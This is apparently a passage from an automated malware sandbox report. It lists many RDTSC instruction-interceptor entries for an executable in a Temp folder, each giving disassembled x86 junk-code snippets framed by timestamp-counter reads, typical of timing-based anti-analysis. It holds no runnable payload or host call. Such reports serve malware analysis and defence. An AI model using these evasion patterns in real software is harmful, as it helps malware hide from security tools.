                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5D537F second address: 5D5393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5D852E second address: 5D8562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0C52764h 0x00000009 jmp 00007F29F0C52767h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5D8562 second address: 5D8566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5D9B15 second address: 5D9B3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52761h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F29F0C5275Dh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5D9B3C second address: 5D9B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4F7683 second address: 4F769C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29F0CD5296h 0x00000008 js 00007F29F0CD5296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 jnp 00007F29F0CD5296h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50ABF8 second address: 50AC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29F0CD52A4h 0x0000000a jmp 00007F29F0CD52A5h 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F29F0CD5296h 0x00000017 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50AC2E second address: 50AC5B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F29F0C52756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F29F0C52760h 0x00000011 push edi 0x00000012 jmp 00007F29F0C5275Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5E07FF second address: 5E0805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5E3577 second address: 5E357F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5E357F second address: 5E3585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4F764D second address: 4F7672 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F29F0C52764h 0x0000000e jo 00007F29F0C52756h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5E3382 second address: 5E33AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push esi 0x00000008 jmp 00007F29F0CD52A4h 0x0000000d jng 00007F29F0CD5296h 0x00000013 pop esi 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5E33AB second address: 5E33C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0C52761h 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5E33C0 second address: 5E33D3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F29F0CD5296h 0x00000008 jnl 00007F29F0CD5296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5EAD39 second address: 5EAD68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C5275Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F29F0C5275Bh 0x00000010 push ecx 0x00000011 jmp 00007F29F0C5275Fh 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop ecx 0x00000019 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5E98DD second address: 5E98E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5E98E3 second address: 5E98FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F29F0C5275Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F29F0C52756h 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5E9C0B second address: 5E9C15 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5E9D91 second address: 5E9D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5E9D96 second address: 5E9D9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5E9EFC second address: 5E9F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F29F0CD529Dh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29F0CD529Ch 0x00000015 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5E9F20 second address: 5E9F24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5E9F24 second address: 5E9F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jne 00007F29F0CD5296h 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5EA099 second address: 5EA0A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5EA0A1 second address: 5EA0DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29F0CD52A0h 0x0000000a jmp 00007F29F0CD52A5h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F29F0CD5296h 0x0000001a jp 00007F29F0CD5296h 0x00000020 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5EA0DC second address: 5EA0E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5EA0E0 second address: 5EA0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5EA0EC second address: 5EA0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5EA0F0 second address: 5EA0F6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5EA0F6 second address: 5EA0FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5EE6B3 second address: 5EE6C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0CD52A0h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5F4F44 second address: 5F4F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5F4F4A second address: 5F4F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5F4F50 second address: 5F4F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5F4F59 second address: 5F4F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5F4F5D second address: 5F4F63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5FED45 second address: 5FED49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5FED49 second address: 5FED64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C5275Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F29F0C5275Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 601EB8 second address: 601EC2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 520013 second address: 52002A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0C52763h 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 506758 second address: 50676F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F29F0CD52A2h 0x0000000f jno 00007F29F0CD5296h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50677D second address: 506799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52768h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 612D48 second address: 612D4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 612D4C second address: 612D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F29F0C52756h 0x0000000e jns 00007F29F0C52756h 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 615788 second address: 6157A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 62DE14 second address: 62DE2B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F29F0C5275Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 62DE2B second address: 62DE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 62DE30 second address: 62DE36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 62E40E second address: 62E417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 62E417 second address: 62E41D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 62E41D second address: 62E42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jbe 00007F29F0CD529Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 62E5B4 second address: 62E5B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 62E5B8 second address: 62E5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F29F0CD5296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 62E5C4 second address: 62E5E4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29F0C52758h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F29F0C52762h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 62E5E4 second address: 62E5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 62E749 second address: 62E75C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jl 00007F29F0C52756h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 62E75C second address: 62E76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F29F0CD5296h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 62E76B second address: 62E76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 62E76F second address: 62E779 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 62E779 second address: 62E788 instructions: 0x00000000 rdtsc 0x00000002 js 00007F29F0C5275Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 62E788 second address: 62E78E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 62E78E second address: 62E796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 632A91 second address: 632A95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 632A95 second address: 632A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 632A9B second address: 632AA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 632CED second address: 632CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 632CF2 second address: 632D0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0CD52A6h 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 632D89 second address: 632D97 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F29F0C52756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 632D97 second address: 632DBB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F29F0CD52A6h 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 632DBB second address: 632E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007F29F0C52756h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f jno 00007F29F0C52758h 0x00000015 push 00000004h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F29F0C52758h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 mov dword ptr [ebp+1246134Ch], ebx 0x00000037 call 00007F29F0C52759h 0x0000003c jmp 00007F29F0C52768h 0x00000041 push eax 0x00000042 jmp 00007F29F0C52764h 0x00000047 mov eax, dword ptr [esp+04h] 0x0000004b push esi 0x0000004c jmp 00007F29F0C52764h 0x00000051 pop esi 0x00000052 mov eax, dword ptr [eax] 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 push edx 0x00000058 pop edx 0x00000059 jmp 00007F29F0C5275Bh 0x0000005e popad 0x0000005f rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 6330D4 second address: 6330D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 6330D8 second address: 6330DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 634B24 second address: 634B36 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F29F0CD529Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 6346AE second address: 6346BE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F29F0C52762h 0x00000008 jg 00007F29F0C52756h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 6346BE second address: 6346DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F29F0CD52A5h 0x0000000d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4C30009 second address: 4C3003D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 jmp 00007F29F0C52763h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F29F0C52765h 0x00000016 rdtsc
